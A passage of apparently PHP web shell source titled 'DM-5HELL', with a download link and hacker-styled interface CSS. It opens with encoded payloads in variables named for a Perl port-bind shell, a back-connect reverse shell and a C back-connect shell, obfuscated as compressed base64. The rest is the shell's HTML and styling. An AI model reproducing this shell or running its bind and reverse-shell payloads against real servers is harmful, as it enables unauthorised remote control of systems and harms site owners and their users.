  2848. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  2849. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  2850. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  2851. $svg_hover='data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c3ZnIHdpZHRoPSIyMHB4IiBoZWlnaHQ9IjIwcHgiIGZpbGw9IiNmZmYiIHZpZXdCb3g9IjAgMCAzMCAzMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJtMTMgMWMtMy4zMDkgMC02IDIuNjkxLTYgNiAwIDEuNzcxIDAuNzc2IDMuMzYwOSAyIDQuNDYwOXYtNC40NjA5YzAtMi4yMDYgMS43OTQtNCA0LTRzNCAxLjc5NCA0IDR2NC40NjA5YzEuMjI0LTEuMDk5IDItMi42ODg5IDItNC40NjA5IDAtMy4zMDktMi42OTEtNi02LTZ6bS0wLjEyNSA0LjAwMzljLTEuMDQ2NyAwLjA2NDU1OS0xLjg3NSAwLjkzMjk3LTEuODc1IDEuOTk2MXYxNWMtMi41NTItMS4yOTktMy41OTUtMi01Ljc5My0yLTEgMC0yLjIwNyAwLjQ0MzI3LTIuMjA3IDEuNTcyM3YwLjQyNzczbDUgMyAzLjM1NzQgMi42ODU1YzEuMDY0IDAuODUxIDIuMzg1IDEuMzE0NSAzLjc0OCAxLjMxNDVoNi44OTQ1YzIuMjA5IDAgNC0xLjc5MSA0LTR2LTItNS41YzAtMC43OTEtMC42MTcyLTEuNDcyLTEuNDA4Mi0xLjQ5OC0wLjQyLTAuMDE0LTAuNzI5OTggMC4wNjg0MDYtMC45NTg5OCAwLjE5MTQxLTAuMzU4IDAuMTkyLTAuODAyNTggMC4wMjk1NDctMS4wMTc2LTAuMzE0NDUtMC4yODUtMC40NTctMC43NzUyMy0wLjg3ODkxLTEuNjE1Mi0wLjg3ODkxLTAuNSAwLTAuODg1ODMgMC4xNDEzMS0xLjE3MzggMC4zMjAzMS0wLjM1NiAwLjIyMi0wLjgwNDc3IDAuMDY0MjY2LTEuMDA5OC0wLjMwMjczLTAuMjgzLTAuNTA5LTAuODE2NDEtMS4wMTc2LTEuODE2NC0xLjAxNzYtMC42MjEgMC0xLjA2NzkgMC4yMDQyMi0xLjM3ODkgMC40NDkyMi0wLjI1MiAwLjE5OC0wLjYyMTA5IDYuODdlLTQgLTAuNjIxMDktMC4zMjAzMXYtNy4wMjE1YzAtMC45OTYtMC42ODEwNi0xLjkyMDEtMS42NjQxLTIuMDgwMS0wLjE1NjYzLTAuMDI1Mzc1LTAuMzExNDEtMC4wMzI2Ni0wLjQ2MDk0LTAuMDIzNDM4eiIgZmlsbD0iIzBmMCIvPjwvc3ZnPg==';
  2852. $svg='data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c3ZnIHdpZHRoPSIyMHB4IiBoZWlnaHQ9IjIwcHgiIHZpZXdCb3g9IjAgMCA2NCA2NCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJtNTQuNjggMjlsLTQwLjUtMTYuMTAyYy0wLjM3MTA5LTAuMTQ4NDQtMC43OTY4OC0wLjA1ODU5NC0xLjA3ODEgMC4yMjI2Ni0wLjI4NTE2IDAuMjgxMjUtMC4zNzEwOSAwLjcwNzAzLTAuMjIyNjYgMS4wNzgxbDE2LjEyMSA0MC41YzAuMTQwNjIgMC4zNTU0NyAwLjQ3MjY2IDAuNTk3NjYgMC44NTE1NiAwLjYyODkxIDAuMzc4OTEgMC4wMzEyNSAwLjc0NjA5LTAuMTYwMTYgMC45Mzc1LTAuNDg4MjhsNi43MzA1LTExLjM5MWMwLjE1NjI1LTAuMjY1NjIgMC40Mjk2OS0wLjQ0NTMxIDAuNzM4MjgtMC40ODQzOCAwLjMwNDY5LTAuMDM5MDYzIDAuNjEzMjggMC4wNjY0MDYgMC44MzIwMyAwLjI4NTE2bDEzLjMwMSAxMy4zNGMwLjM3NSAwLjM3NSAwLjg4MjgxIDAuNTg1OTQgMS40MTQxIDAuNTg1OTRzMS4wMzkxLTAuMjEwOTQgMS40MTQxLTAuNTg1OTRsMS40MTAyLTEuNDEwMmMwLjM3NS0wLjM3NSAwLjU4NTk0LTAuODgyODEgMC41ODU5NC0xLjQxNDFzLTAuMjEwOTQtMS4wMzkxLTAuNTg1OTQtMS40MTQxbC0xMy4zNC0xMy4zNTJjLTAuMjE4NzUtMC4yMTg3NS0wLjMyNDIyLTAuNTI3MzQtMC4yODUxNi0wLjgzNTk0IDAuMDM5MDYzLTAuMzA0NjkgMC4yMTg3NS0wLjU3ODEyIDAuNDg0MzgtMC43MzQzOGwxMS4zMzItNi42Nzk3YzAuMzA0NjktMC4xOTkyMiAwLjQ3NjU2LTAuNTUwNzggMC40NDkyMi0wLjkxNzk3LTAuMDMxMjUtMC4zNjMyOC0wLjI1MzkxLTAuNjgzNTktMC41ODk4NC0wLjgzMjAzeiIgZmlsbD0iIzBmMCIvPjxwYXRoIGQ9Im0xNC4xMDIgMTcuMjdsMzggMTUuMDkgMi42OTkyLTEuNTg5OGMwLjMxNjQxLTAuMTk1MzEgMC41LTAuNTUwNzggMC40NzY1Ni0wLjkyMTg4LTAuMDI3MzQ0LTAuMzcxMDktMC4yNTM5MS0wLjY5OTIyLTAuNTk3NjYtMC44NDc2NmwtNDAuNS0xNi4xMDJjLTAuMzcxMDktMC4xNDg0NC0wLjc5Njg4LTAuMDU4NTk0LTEuMDc4MSAwLjIyMjY2LTAuMjg1MTYgMC4yODEyNS0wLjM3MTA5IDAuNzA3MDMtMC4yMjI2NiAxLjA3ODF6IiBmaWxsPSIjMGYwIi8+PHBhdGggZD0ibTU2LjYyOSA1Mi4zNTJsLTEyLjEwOS0xMi4xMDJjLTAuNzQyMTkgMC40NTMxMi0xLjIzODMgMS4yMjI3LTEuMzM5OCAyLjA4OTgtMC4xMDE1NiAwLjg2MzI4IDAuMTk5MjIgMS43MjY2IDAuODIwMzEgMi4zMzk4bDExLjUzOSAxMS41OSAxLjA4OTgtMS4wODk4YzAuMzc1LTAuMzc1IDAuNTg1OTQtMC44ODI4MSAwLjU4NTk0LTEuNDE0MXMtMC4yMTA5NC0xLjAzOTEtMC41ODU5NC0xLjQxNDF6IiBmaWxsPSIjMGYwIi8+PHBhdGggZD0ibTU3LjM0IDUxLjY0MWwtMTMuMzQtMTMuMzMyIDExLjMyOC02LjY3OTdjMC42ODc1LTAuMzg2NzIgMS4wNzgxLTEuMTM2NyAxLjAwNzgtMS45MjE5LTAuMDcwMzEzLTAuNzgxMjUtMC41OTM3NS0xLjQ0OTItMS4zMzU5LTEuNzA3bC00MC40NDktMTZjLTAuNzQyMTktMC4yOTY4OC0xLjU5MzgtMC4xMjUtMi4xNjAyIDAuNDQxNDEtMC41NjI1IDAuNTY2NDEtMC43MzgyOCAxLjQxNDEtMC40NDE0MSAyLjE2MDJsMTYuMDUxIDQwLjQ2OWMwLjI4MTI1IDAuNzA3MDMgMC45NDE0MSAxLjE5NTMgMS43MDMxIDEuMjUzOSAwLjc2MTcyIDAuMDYyNSAxLjQ4ODMtMC4zMTY0MSAxLjg3NS0wLjk3MjY2bDYuNzYxNy0xMS4zNTIgMTMuMzQgMTMuMzAxYzEuMTcxOSAxLjE2OCAzLjA3MDMgMS4xNjggNC4yNDIyIDBsMS40MTgtMS40MTAyYzAuNTY2NDEtMC41NjI1IDAuODgyODEtMS4zMjgxIDAuODgyODEtMi4xMjVzLTAuMzE2NDEtMS41NjI1LTAuODgyODEtMi4xMjV6bS0xLjQxMDIgMi44MjgxbC0xLjQxOCAxLjQxMDJjLTAuMzkwNjIgMC4zOTA2Mi0xLjAyMzQgMC4zOTA2Mi0xLjQxMDIgMGwtMTMuMzUyLTEzLjM0Yy0wLjM4MjgxLTAuMzU1NDctMC44ODY3Mi0wLjU1MDc4LTEuNDEwMi0wLjUzOTA2aC0wLjI2MTcyYy0wLjYxNzE5IDAuMDg1OTM4LTEuMTYwMiAwLjQ1NzAzLTEuNDY4OCAxbC02LjczMDUgMTEuMzI4LTE2LjA3LTQwLjUgNDAuNSAxNi4wNy0xMS4zMDkgNi42Nzk3Yy0wLjUzNTE2IDAuMzE2NDEtMC44OTQ1MyAwLjg1OTM4LTAuOTcyNjYgMS40NzI3LTAuMDc4MTI1IDAuNjE3MTkgMC4xMzI4MSAxLjIzMDUgMC41NzQyMiAxLjY2OGwxMy4zMiAxMy4zNGMwLjM4NjcyIDAuMzkwNjIgMC4zODY3MiAxLjAxOTUgMCAxLjQxMDJ6IiBmaWxsPSIjMGZmIi8+PHBhdGggZD0ibTQ0IDMwLjEwOWMwLjQ4MDQ3IDAgMC44OTQ1My0wLjMzOTg0IDAuOTg0MzgtMC44MTI1IDAuMDg5ODQ0LTAuNDY4NzUtMC4xNjc5Ny0wLjk0MTQxLTAuNjEzMjgtMS4xMTcybC0xNC42OTktNS44MjgxYy0wLjUxNTYyLTAuMjA3MDMtMS4wOTc3IDAuMDQyOTY4LTEuMzAwOCAwLjU1ODU5LTAuMjA3MDMgMC41MTE3MiAwLjA0Njg3NSAxLjA5MzggMC41NTg1OSAxLjMwMDhsMTQuNjYgNS43ODkxYzAuMTI4OTEgMC4wNjY0MDYgMC4yNjU2MiAwLjEwMTU2IDAuNDEwMTYgMC4xMDkzOHoiIGZpbGw9IiMwZmYiLz48cGF0aCBkPSJtMjUuNTcgMjAuNzM4bC0zLjE0ODQtMS4yNWMtMC41MTU2Mi0wLjIwMzEyLTEuMDk3NyAwLjA0Njg3NS0xLjMwMDggMC41NjI1LTAuMjA3MDMgMC41MTE3MiAwLjA0Njg3NSAxLjA5MzggMC41NTg1OSAxLjMwMDhsMy4xNDg0IDEuMjVjMC41MTU2MiAwLjIwMzEyIDEuMDk3Ny0wLjA0Njg3NSAxLjMwMDgtMC41NjI1IDAuMjA3MDMtMC41MTE3Mi0wLjA0Njg3NS0xLjA5MzgtMC41NTg1OS0xLjMwMDh6IiBmaWxsPSIjMGZmIi8+PHBhdGggZD0ibTggNi43MTg4Yy0wLjM5ODQ0LTAuMzM1OTQtMC45OTIxOS0wLjMwODU5LTEuMzU1NSAwLjA2MjUtMC4zNjcxOSAwLjM3MTA5LTAuMzg2NzIgMC45NjQ4NC0wLjA0Mjk2OCAxLjM1OTRsMS40NTcgMS40NjA5YzAuMzkwNjIgMC4zOTA2MiAxLjAyMzQgMC4zOTQ1MyAxLjQxOCAwLjAwMzkwNiAwLjM5MDYyLTAuMzkwNjIgMC4zOTQ1My0xLjAyMzQgMC4wMDM5MDYtMS40MTQxeiIgZmlsbD0iIzBmZiIvPjxwYXRoIGQ9Im0xNC4xNzIgOC4wNzAzYzAuNTUwNzggMCAxLTAuNDQ5MjIgMS0xdi0yLjA3MDNjMC0wLjU1MDc4LTAuNDQ5MjItMS0xLTEtMC41NTQ2OSAwLTEgMC40NDkyMi0xIDF2Mi4wNzAzYzAgMC41NTA3OCAwLjQ0NTMxIDEgMSAxeiIgZmlsbD0iIzBmZiIvPjxwYXRoIGQ9Im03Ljk0OTIgMTQuMjg5YzAtMC41NTA3OC0wLjQ0NTMxLTEtMS0xaC0yLjA3ODFjLTAuNTU0NjkgMC0xIDAuNDQ5MjItMSAxIDAgMC41NTQ2OSAwLjQ0NTMxIDEgMSAxaDIuMDc4MWMwLjU1NDY5IDAgMS0wLjQ0NTMxIDEtMXoiIGZpbGw9IiMwZmYiLz48cGF0aCBkPSJtOC4wNTg2IDE5bC0xLjQ1NyAxLjQ0OTJjLTAuMzA0NjkgMC4yMzgyOC0wLjQ0MTQxIDAuNjI4OTEtMC4zNTkzOCAxLjAwMzkgMC4wODU5MzcgMC4zNzUgMC4zNzUgMC42Njc5NyAwLjc1IDAuNzU3ODEgMC4zNzUgMC4wODU5MzcgMC43NjU2Mi0wLjA1MDc4MiAxLjAwNzgtMC4zNTE1NmwxLjQ4MDUtMS40NjA5YzAuMzM1OTQtMC4zOTg0NCAwLjMwODU5LTAuOTg4MjgtMC4wNjI1LTEuMzU1NS0wLjM3MTA5LTAuMzY3MTktMC45NjQ4NC0wLjM4NjcyLTEuMzU5NC0wLjA0Mjk2OXoiIGZpbGw9IiMwZmYiLz48cGF0aCBkPSJtMTkuNTU5IDkuODkwNmMwLjI2NTYyIDAgMC41MjM0NC0wLjEwMTU2IDAuNzEwOTQtMC4yODkwNmwxLjQ2ODgtMS40NzI3YzAuMzM5ODQtMC4zOTQ1MyAwLjMyMDMxLTAuOTg4MjgtMC4wNTA3ODEtMS4zNTU1LTAuMzcxMDktMC4zNzEwOS0wLjk2MDk0LTAuMzk0NTMtMS4zNTk0LTAuMDU0Njg4bC0xLjQ2ODggMS40NzI3Yy0wLjI4OTA2IDAuMjg1MTYtMC4zNzUgMC43MTg3NS0wLjIxODc1IDEuMDkzOHMwLjUyMzQ0IDAuNjE3MTkgMC45Mjk2OSAwLjYxMzI4eiIgZmlsbD0iIzBmZiIvPjwvc3ZnPg==';
  2853. header('Content-type: text/html; charset=utf-8');
  2854. ob_start();?>
  2855. <!-- DM-5HELL Edited By Eddie Kidiw Downloads: https://pastebin.com/5S87iwwV -->
  2856. <!DOCTYPE html>
  2857. <html>
  2858. <head>
  2859. <title>&#x2E;&#x2E;&#x3A;&#x3A;&#x20;&#x44;&#x4D;&#x2D;&#x35;&#x48;&#x45;&#x4C;&#x4C;&#x20;&#x3A;&#x3A;&#x2E;&#x2E;</title>
  2860. <link rel="icon" href="https://2.bp.blogspot.com/-2nnyHHEhtLw/WdFD55i9UII/AAAAAAAABsA/9hyAovuIWOcubLbfnrjc3UYIZrkTLoukgCKgBGAs/s1600/vavicon.ico" type="image/x-icon">
  2861. <script type="text/javascript">function tukar(e,n){document.getElementById(e).style.display="none",document.getElementById(n).style.display="block"}function blink(){for(var e=document.getElementsByTagName("kelip"),n=e.length-1;n>=0;n--){var t=e[n];t.style.visibility="visible"===t.style.visibility?"hidden":"visible"}window.setTimeout(blink,500)}document.addEventListener?document.addEventListener("DOMContentLoaded",blink,!1):window.addEventListener?window.addEventListener("load",blink,!1):window.attachEvent?window.attachEvent("onload",blink):window.onload=blink;</script>
  2862. <style type="text/css">
  2863. @font-face{font-family:monsters_attack;src:url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/b52a898e/monsters_attack_1937-webfont.eot);src:url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/b52a898e/monsters_attack_1937-webfont.eot?#iefix) format('embedded-opentype'),url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/b52a898e/monsters_attack_1937-webfont.woff2) format('woff2'),url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/b52a898e/monsters_attack_1937-webfont.woff) format('woff'),url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/b52a898e/monsters_attack_1937-webfont.ttf) format('truetype'),url(https://cdn.rawgit.com/EddieKidiw/Monsters-Attack-1937/master/monsters_attack_1937-webfont.svg#monsters_attackregular) format('svg');font-weight:400;font-style:normal}
  2864. input,button{border-radius:10px}textarea{font-size:10px}textarea,textarea:hover{width:100%;color:#0f0;height:400px;font-family:Roboto,Arial,sans-serif;font:100%/1.25 none}a:hover,input[type=submit]{cursor:url(<?php echo $svg_hover;?>),default}#menu a:hover,input[type=checkbox],input[type=radio],select,textarea,textarea:hover{background:rgba(0,1,0,.3);border-bottom:1px solid #0f0;border-top:1px solid #0f0}#menu a,#menu a:hover,input[type=checkbox],input[type=radio],select,textarea,textarea:hover{border-right:1px solid #0f0;border-left:1px solid #0f0}#menu a,.phpinfo a:link,a,a:hover{text-decoration:none}.b_tbl,.c_tbl,.phpinfo .center{text-align:center}.explore table,.phpinfo table{border-collapse:collapse}#menu a,.explore tr{white-space:nowrap}#menu a,.logout{letter-spacing:2px}body,html{cursor:url(<?php echo $svg;?>),default}body{font-family:Roboto, Arial, sans-serif;background-color:#000;background-image:url(https://i0.wp.com/securecdn.pymnts.com/wp-content/uploads/2016/08/hacking-group-Remsec-malware.jpg);background-position:center center;background-repeat:no-repeat;background-attachment:fixed;background-size:cover;font-size:12px}input[type=file]{color:#0f0;border:0px solid transparent}button[type=submit],input[type=email],input[type=number],input[type=password],input[type=submit],input[type=text]{background:rgba(0,1,0,.3);color:#0f0;border-bottom:1px solid #0f0;border-top:1px solid #0f0;border-right:1px solid #444;border-left:1px solid #444}button[type=submit],input[type=submit]{font-family:FontAwesome;color:#fff;padding:0.2em 0.4em 0.2em 0.4em;margin:-1px}input[type=checkbox],input[type=radio]{color:#0f0}textarea:hover{box-shadow:0 0 15px 0 #0f0}#logo{font-family:"monsters_attack";font-size:100px}#logo a{color:#0f0;text-shadow:2px 2px #fff;text-decoration:none}a:hover{color:#0f0}*{color:#fff}#menu{background:0 0;margin:1px}#menu a{padding:1px 10px;margin:0;background:rgba(0,1,0,.8);border-radius:4px;border-bottom:1px solid #444;border-top:1px solid #444}#menu a:hover{border-radius:8px}.inputz,.inputzbut,.output{background:rgba(0,0,0,.3)}.tabnet{margin:15px auto 0;border:1px solid #333}.main{width:90%;margin:30px auto 10px;padding:10px 10px 5px;border-radius:5px;-moz-border-radius:5px;-moz-box-shadow:0 0 10px #fff}.cmdbox,.output{width:100%}.gaya{color:#0f0}.gaya a,.inputz,.inputzbut{color:#fff}.inputz{border:0;padding:2px;border-bottom:1px solid #0f0;border-top:1px solid #0f0}.inputzbut{color:#lime;margin:0 4px;border:1px solid #444;border-bottom:1px solid #0f0;border-top:1px solid #0f0;border-right:1px solid #0f0;border-left:1px solid #0f0}.dminfox,.output{color:#fff}.inputz:hover,.inputzbut:hover{border-bottom:1px solid #fff;border-top:1px solid #fff}.output{margin:auto;border:1px solid #0f0;height:400px;padding:0 2px}.head_info{padding:0 4px}.infodmx{color:#0f0}.b0{font-size:30px;padding:0;color:#444}.b1,.b2{font-size:25px;padding:0}.b1{color:#0f0}.b2{color:#fff}.b3{background:0 0;font-size:10px;padding:0;color:#0f0}.b10,.b4,.b5,.b6,.b7,.b8,.b9{font-size:20px}.b4{padding:0;color:red}.b5{padding:0;color:#fff}.b6,.b7{padding:0;color:#0f0}.b8{padding:0;color:#fff}.b9{padding:0;color:#ff0}.b10{padding:0;color:#444}.b11,.b12{font-size:10px;padding:0}.b11{color:#ff0}.b12{color:#444}.b_tbl{margin:0 1px 0 0;padding:0 1px 0 0;border-right:1px solid #333}.c_tbl{margin:0 4px 0 0;padding:0 4px 0 0;border-left:1px solid #333}.phpinfo table{width:100%;padding:0}.phpinfo pre{margin:0;font-family:monospace}.phpinfo a:link{color:#009;background-color:#fff}.phpinfo a:hover{text-decoration:underline}.explore a,.logout{text-decoration:none}.phpinfo .center table{margin-left:auto;margin-right:auto;text-align:left}.phpinfo .center th{text-align:center!important}.phpinfo td,th{border:1px solid #000;vertical-align:baseline}.phpinfo h1{font-size:150%}.phpinfo .p{text-align:left}.phpinfo .e{background-color:#ccf;font-weight:700;color:#000}.phpinfo .h{background-color:#99c;font-weight:700;color:#000}.phpinfo .v,.phpinfo .vr,.phpinfo hr{background-color:#ccc;color:#000}.phpinfo .vr{text-align:right}.phpinfo img{float:right;border:0}.phpinfo hr{width:600px;border:0;height:1px}.phpinfo h2,.phpinfo h2 a{text-align:center;font-size:16px;margin:30px 0 0;background:#222;padding:4px 0}.explore{width:100%}.explore tr:nth-child(even){background:rgba(211,211,211,.66)}.explore tr:nth-child(odd){background:rgba(128,128,128,.66)}.explore td{#border-bottom:1px solid #fff;#padding:0 8px;#line-height:10px}.explore th{background:rgba(0,1,0,.9);padding:5px 15px;font-weight:400 white-space:nowrap;color:#0f0}.explore th:hover,.phpinfo th:hover{border-bottom:1px solid #0f0}.explore tr:hover{background:rgba(0,0,0,.7);color:rgba(0,0,0,.7);cursor:pointer cursor:url(<?php echo $svg;?>),progress}.viewfile,.viewfile:hover{color:#fff;margin:4px 2px;padding:8px}.viewfile{background-color:rgba(255,255,255,0.62);border-radius:30px;-moz-border-radius:30px;-webkit-border-radius:30px;border:1px solid transparent}.viewfile:hover{border-radius:30px;-moz-border-radius:30px;-webkit-border-radius:30px;border:1px solid transparent;box-shadow:0 0 8px 0 #0f0}.sembunyi{display:none;padding:0;margin:0}.info{background:#111;width:99%;padding:5px;margin:10px auto 5px;text-align:center;font-size:13px}.info a,.info span{font-size:14px}.jaya{margin:5px;text-align:right}.click:hover{box-shadow:0 0 15px 0 #0f0;cursor:url(<?php echo $svg_hover;?>),default}.logout{padding:4px 18px;margin:0;background:rgba(0,1,0,.8);border-radius:4px;border-bottom:1px solid #444;border-top:1px solid #444;border-right:1px solid #0f0;border-left:1px solid #0f0}.inf{white-space:nowrap;}table{font-size:12px;}.true_code{color: #f00}
  2865. .fa-file-powerpoint-o,.fa-file-excel-o,.fa-file-word-o,.fa-file-video-o,.fa-file-audio-o,.fa-file-pdf-o,.fa-file-text-o,.fa-file-archive-o,.fa-home,.fa-reply-all,.fa-file-image-o,.fa-file-code-o{color:#0f0}.fa-folder{color:#eeae4a;}.dlzip{color:#fff}
  2866. h1,h2{font-size:150%;padding:.8em 1em;font-weight:400}h1,h2,h3{font-weight:400}form,h1{margin:0}code,h1{background:transparent}h3,pre{margin:1em 0 0}img,input[type=image]{vertical-align:middle}h1{border-bottom:1px solid #999;color:#777}h2{margin:0 0 20px -18px;border-bottom:1px solid #000;color:#000;background:#ddf}h3{font-size:130%}fieldset{display:inline;vertical-align:top;padding:.5em .8em;margin:.8em .5em 0 0;border:1px solid #999}p{margin:.8em 20px 0 0}img{border:0}td img{max-width:200px;max-height:200px}pre{font:100%/1.25 monospace}#breadcrumb,#lang{top:0;line-height:1.8em}#h1,.jush-php_quo_var,.jush-php_var,.jush-sql_var,.view{font-style:italic}input.default{box-shadow:1px 1px 1px #777}input.maxlength,input.required{box-shadow:1px 1px 1px red}input.wayoff{left:-1000px;position:absolute}.block{display:block}.js .hidden,.nojs .jsonly{display:none}.js .column{position:absolute;background:#ddf;padding:.27em 1ex .3em 0;margin-top:-.27em}.error{color:red}.error b{background:#fff;font-weight:400}.message{color:#0f0;background:rgba(255,255,255,.26)}.error,.message{padding:.5em .8em;margin:1em 20px 0 0}.char{color:#007F00}.date{color:#7F007F}.enum{color:#007F7F}.binary{color:red}.time{color:silver;font-size:70%}.datetime,.function,.number{text-align:right}.type{width:15ex;width:auto\9}.options select{width:20ex;width:auto\9}.active{font-weight:700}.sqlarea{width:98%}.icon{width:18px;height:18px;background-color:navy}.icon:hover{background-color:red}.size{width:6ex}.help{cursor:help}.pages{bottom:0;left:21em;padding:5px;border:1px solid #0f0}#help,#schema .references,#schema .table{position:absolute}.loadmore{margin-left:1ex}#breadcrumb,#content a,#menus a{padding:1px;margin:1px}#menus{margin:10px 0 0;padding:0 0 30px;top:2em;left:0}#menustable,input{background:transparent;border:1px solid #0f0;border-collapse:collapse;white-space:nowrap}#menustable td,#menustable th{border:1px solid #0f0;white-space:nowrap}#menus p,#tables{padding:.2em 1em;margin:0;border-bottom:1px solid #0f0}#tables li{list-style:none}#dbs{overflow:hidden}#logins,#tables{white-space:nowrap;overflow:auto}#content{margin:2em 0 0 21em;padding:10px 20px 20px 0}#lang{left:0;padding:.3em 1em}#breadcrumb{white-space:nowrap;left:21em;height:2em}#h1{color:#777;text-decoration:none}#version{font-size:67%;color:red}#schema{margin-left:60px;position:relative;-moz-user-select:none;-webkit-user-select:none}#schema .table{border:1px solid silver;padding:0 2px;cursor:move}#help{border:1px solid #999;background:#eee;padding:5px;font-family:monospace;z-index:1}.rtl h2{margin:0 -18px 20px 0}.rtl .error,.rtl .message,.rtl p,.rtl table{margin:1em 0 0 20px}.rtl .logout{left:0;right:auto}.rtl #breadcrumb,.rtl .pages{right:21em;left:auto}.rtl #content{margin:2em 21em 0 0;padding:10px 0 20px 20px}.rtl #breadcrumb{margin:0 -18px 0 0}.rtl input.wayoff{left:auto;right:-1000px}.rtl #lang,.rtl #menus{left:auto;right:0}@media all and (max-device-width:880px){#lang,#menus{position:static}#breadcrumb,.pages{left:auto}.rtl #breadcrumb,.rtl .pages{right:auto}#menus{width:auto}#content{margin-left:10px}#lang{border-top:1px solid #999}.rtl #content{margin-right:10px}}@media print{#lang,#menus{display:none}#content{margin-left:1em}#breadcrumb{left:1em}.nowrap td,.nowrap th,td.nowrap{white-space:normal}}.jush{color:#000}.jush-com,.jush-com_code,.jush-htm_com,.jush-js_doc,.jush-js_one,.jush-one,.jush-php_com,.jush-php_doc,.jush-php_one{color:gray}.jush-php,.jush-php_fun,.jush-php_new{color:#003;background-color:#FFF0F0}.jush-apo,.jush-php_eot,.jush-php_quo,.jush-quo,.jush-quo_one,.jush-sql_apo,.jush-sql_eot,.jush-sql_quo,.jush-sqlite_apo{color:green}.jush-php_apo{color:#009F00}.jush-php_apo .jush-php_quo_var,.jush-php_apo .jush-php_var{font-style:normal}.jush-php_halt2{background-color:#fff;color:#000}.jush-att_css .jush-att_apo,.jush-att_css .jush-att_quo,.jush-att_css .jush-att_val,.jush-tag_css{color:#000;background-color:#FFFFE0}.jush-att_js .jush-att_apo,.jush-att_js .jush-att_quo,.jush-att_js .jush-att_val,.jush-css_js,.jush-tag_js{color:#000;background-color:#F0F0FF}.jush-tag,.jush-xml_tag{color:navy}.jush-att,.jush-att_css,.jush-att_http,.jush-att_js,.jush-xml_att{color:teal}.jush-att_apo,.jush-att_quo,.jush-att_val,.jush-ent,.jush-js_key,.jush-js_key .jush-apo,.jush-js_key .jush-quo{color:purple}.jush-js_reg{color:navy}.jush-php_mssql .jush-php_apo,.jush-php_mssql .jush-php_quo,.jush-php_oracle .jush-php_apo,.jush-php_oracle .jush-php_quo,.jush-php_pgsql .jush-php_apo,.jush-php_pgsql .jush-php_quo,.jush-php_sql .jush-php_apo,.jush-php_sql .jush-php_quo,.jush-php_sqlite .jush-php_apo,.jush-php_sqlite .jush-php_quo{background-color:#FFBBB0}.jush-bac,.jush-bra,.jush-mssql_bra,.jush-php_bac,.jush-sqlite_quo{color:red}.jush-clr,.jush-num{color:#007F7F}.jush a{color:navy}.jush a.jush-help{cursor:help}.jush-mssql a,.jush-oracle a,.jush-pgsql a,.jush-simpledb a,.jush-sql a,.jush-sql_code a,.jush-sqlite a{background:rgba(255,255,255,.26);font-weight:700}.jush-php_sql .jush-php_apo a,.jush-php_sql .jush-php_quo a{font-weight:400}.jush-apo a,.jush-att a,.jush-php_apo a,.jush-php_eot2 a,.jush-php_quo a,.jush-quo a,.jush-tag a{color:inherit;color:expression(parentNode.currentStyle.color)}a.jush-custom:link,a.jush-custom:visited{font-weight:400;color:inherit;color:expression(parentNode.currentStyle.color)}.jush p{margin:0}
  2867. .num{float:left;color:#0f0;font-family:monospace;text-align:right;margin-right:6pt;padding-right:6pt;border-right:1px solid #fff}
  2868. .inputsubmit{text-indent:-99em;width:28px}.awesome{position:relative}.awesome:after{font-family:FontAwesome;content:"\f058";font-size:15px;position:absolute;right:7px;top:0.0em;pointer-events:none}
